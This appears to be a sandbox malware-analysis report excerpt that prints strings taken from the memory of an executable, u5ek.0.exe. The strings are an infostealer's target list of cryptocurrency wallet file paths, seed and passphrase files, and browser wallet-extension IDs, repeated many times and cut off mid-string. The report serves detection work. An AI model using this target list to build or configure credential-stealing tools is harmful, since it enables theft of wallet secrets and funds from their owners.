Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.000000000432A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia 